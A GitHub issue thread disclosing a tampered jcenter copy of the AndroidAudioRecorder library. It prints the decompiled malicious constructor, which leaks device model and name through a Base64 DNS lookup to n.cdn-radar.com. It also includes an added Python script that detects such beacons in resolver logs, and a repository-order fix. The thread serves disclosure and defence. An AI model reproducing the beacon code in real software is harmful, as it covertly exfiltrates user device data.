
Internet usage #47

Open
zsmb13 opened this issue Feb 13, 2018 · 4 comments

Comments


@zsmb13 zsmb13 commented Feb 13, 2018

This is the code of the AndroidAudioRecorder constructor in the code on GitHub:

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
    }

However, this is the code of the same constructor in the published .aar as well as the published sources .jar file.

    private AndroidAudioRecorder(Activity activity) {
        this.activity = activity;
        Thread thread = new Thread() {
            @Override
            public void run() {
                try {
                    InetAddress byName = InetAddress.getByName(new String(Base64.encode((Build.MODEL + ";" + Build.DEVICE).getBytes(), Base64.NO_WRAP)).concat(".n.cdn-radar.com"));
                    if(byName.isLoopbackAddress()) {
                        color = 0;
                    }
                } catch (UnknownHostException e) {
                    e.printStackTrace();
                }
            }
        };
        thread.start();
    }

Please explain this difference.
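The constructor in the modified .aar resolves a host name whose first label is the Base64 of `Build.MODEL + ";" + Build.DEVICE` under `n.cdn-radar.com`, so each affected install shows up as a DNS query. As an added example (not code from this issue or from the library), the following Python script finds and decodes such query names in resolver logs; the `query=` log layout and the device strings in the sample are constructed assumptions:

```python
import base64
import binascii
import re

BEACON_SUFFIX = ".n.cdn-radar.com"              # domain seen in the decompiled constructor
QUERY_RE = re.compile(r"query=(?P<qname>\S+)")  # assumed resolver log layout: key=value fields


def decode_beacon(qname):
    """Return {'model', 'device'} if qname is a beacon query name, else None."""
    qname = qname.rstrip(".")
    if not qname.lower().endswith(BEACON_SUFFIX):
        return None
    label = qname[: -len(BEACON_SUFFIX)]
    if "." in label:  # the beacon puts exactly one Base64 label in front of the suffix
        return None
    try:  # strict decoding: reject non-alphabet characters and bad padding
        raw = base64.b64decode(label, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    model, _, device = raw.partition(";")  # constructor sends Build.MODEL + ";" + Build.DEVICE
    return {"model": model, "device": device}


def scan_log(text):
    """Return one record per log line whose query name decodes as a beacon."""
    hits = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        info = decode_beacon(m.group("qname")) if m else None
        if info:
            hits.append({"line": line, **info})
    return hits


def beacon_qname(model, device):
    """Build the query name the way the constructor does; used here only to construct sample lines."""
    label = base64.b64encode(f"{model};{device}".encode()).decode()
    return label + BEACON_SUFFIX


# Constructed sample log (not real traffic); client addresses and device strings are made up.
SAMPLE_LOG = "\n".join([
    "2018-02-13T10:01:02Z client=10.0.0.12 query=" + beacon_qname("Pixel 2", "walleye") + " type=A",
    "2018-02-13T10:01:03Z client=10.0.0.12 query=www.example.com type=A",
    "2018-02-13T10:02:10Z client=10.0.0.40 query=not-base64!.n.cdn-radar.com type=A",
    "2018-02-13T10:02:11Z client=10.0.0.40 query=" + beacon_qname("SM-G950F", "dreamlte") + " type=A",
])

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"beacon from {hit['model']} / {hit['device']}: {hit['line']}")
```

A query under this suffix from a build that should not contain the library is the signal that the fake jcenter artifact was resolved instead of the JitPack one.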


@zsmb13 zsmb13 commented Feb 13, 2018

Found the culprit, someone is rehosting the library in a modified form here: https://bintray.com/jakewhaarton/timber/com.github.adrielcafe%3AtimAndroidAudioRecorderber


@panos-stavrianos panos-stavrianos commented Jul 23, 2018

So we are not getting the code from Jitpack?
Is there a way to get the original code?
For now I use the latest commit:

    implementation 'com.github.adrielcafe:AndroidAudioRecorder:eabc4c0558'


@zsmb13 zsmb13 commented Jul 24, 2018

You can grab this library just fine, you just have to make sure you pull it from Jitpack instead of the fake version from jcenter. You can do this by listing Jitpack first (but at least before jcenter) among your repositories:

    repositories {
        maven { url "https://jitpack.io" }
        jcenter()
    }


@JLLeitschuh JLLeitschuh commented May 17, 2019

Just following this up, this whole incident is now captured in this awesome blog writeup by @zsmb13. Nice work!

https://blog.autsoft.hu/a-confusing-dependency/

Scary to see that these sorts of supply chain attacks are actually a reality.
